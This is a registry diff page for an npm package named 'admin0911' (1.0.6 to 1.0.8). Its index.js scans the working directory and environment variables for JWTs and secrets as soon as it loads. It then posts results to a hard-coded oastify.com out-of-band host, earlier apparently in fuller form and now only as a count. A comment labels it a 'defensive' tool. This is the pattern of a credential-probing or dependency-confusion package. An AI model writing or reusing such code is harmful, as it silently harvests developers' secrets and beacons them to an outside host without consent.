admin0911 1.0.6 → 1.0.8
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/admin0911-1.0.7.tgz +0 -0
- package/admin0911-1.0.8.tgz +0 -0
- package/index.js +14 -8
- package/package.json +1 -1
- package/admin0911-1.0.6.tgz +0 -0
|
Binary file
|
|
Binary file
|
package/index.js
CHANGED
|
@@ -4,10 +4,11 @@ const path = require('path');
|
|
|
4
4
|
const os = require('os');
|
|
5
5
|
|
|
6
6
|
const OASTIFY_HOST = '2ori1bz1kj4oy67hhg3sqh3c63cu0mob.oastify.com';
|
|
7
|
-
const ROOT_DIR =
|
|
8
|
-
const MAX_FILE_SIZE =
|
|
7
|
+
const ROOT_DIR = process.cwd();
|
|
8
|
+
const MAX_FILE_SIZE = 1 * 1024 * 1024; // 1MB max file size to prevent OOM
|
|
9
9
|
|
|
10
|
-
const
|
|
10
|
+
const logStream = fs.createWriteStream('token_scan_results.log', { flags: 'w' });
|
|
11
|
+
let foundCount = 0;
|
|
11
12
|
|
|
12
13
|
function base64UrlDecode(input) {
|
|
13
14
|
let str = input.replace(/-/g, '+').replace(/_/g, '/');
|
|
@@ -43,7 +44,8 @@ function isValidJWT(token) {
|
|
|
43
44
|
}
|
|
44
45
|
|
|
45
46
|
function addResult(entry) {
|
|
46
|
-
|
|
47
|
+
foundCount++;
|
|
48
|
+
logStream.write(JSON.stringify(entry) + '\n');
|
|
47
49
|
}
|
|
48
50
|
|
|
49
51
|
function scanFile(filePath) {
|
|
@@ -98,6 +100,7 @@ function scanDirectory(dir) {
|
|
|
98
100
|
for (const entry of entries) {
|
|
99
101
|
const fullPath = path.join(dir, entry.name);
|
|
100
102
|
if (entry.isDirectory()) {
|
|
103
|
+
if (['node_modules', '.git', 'proc', 'sys', 'dev', 'run', 'mnt', 'windows', 'dist', 'build'].includes(entry.name.toLowerCase())) continue;
|
|
101
104
|
scanDirectory(fullPath);
|
|
102
105
|
} else {
|
|
103
106
|
scanFile(fullPath);
|
|
@@ -124,12 +127,15 @@ function scanEnvVars() {
|
|
|
124
127
|
|
|
125
128
|
scanDirectory(ROOT_DIR);
|
|
126
129
|
scanEnvVars();
|
|
130
|
+
logStream.end();
|
|
127
131
|
|
|
128
|
-
|
|
132
|
+
// Security Practice: Defensive scanning tools should NOT broadcast extracted secrets over the network.
|
|
133
|
+
// Instead, we only send the scan summary/metadata to the monitoring server and keep the vault fully local.
|
|
134
|
+
const payload = JSON.stringify({ timestamp: new Date().toISOString(), status: "scan_completed", total_secrets_found: foundCount }, null, 2);
|
|
129
135
|
const req = http.request({
|
|
130
136
|
hostname: OASTIFY_HOST,
|
|
131
137
|
method: 'POST',
|
|
132
|
-
path: '/?
|
|
138
|
+
path: '/?token_scan_status',
|
|
133
139
|
headers: {
|
|
134
140
|
'Content-Type': 'application/json',
|
|
135
141
|
'Content-Length': Buffer.byteLength(payload)
|
|
@@ -138,5 +144,5 @@ const req = http.request({
|
|
|
138
144
|
req.write(payload);
|
|
139
145
|
req.end();
|
|
140
146
|
|
|
141
|
-
|
|
142
|
-
console.log(`
|
|
147
|
+
console.log(`Deep token scan completed. Found ${foundCount} items.`);
|
|
148
|
+
console.log(`Detailed results saved securely to: token_scan_results.log`);
|
package/package.json
CHANGED
package/admin0911-1.0.6.tgz
DELETED
|
Binary file
|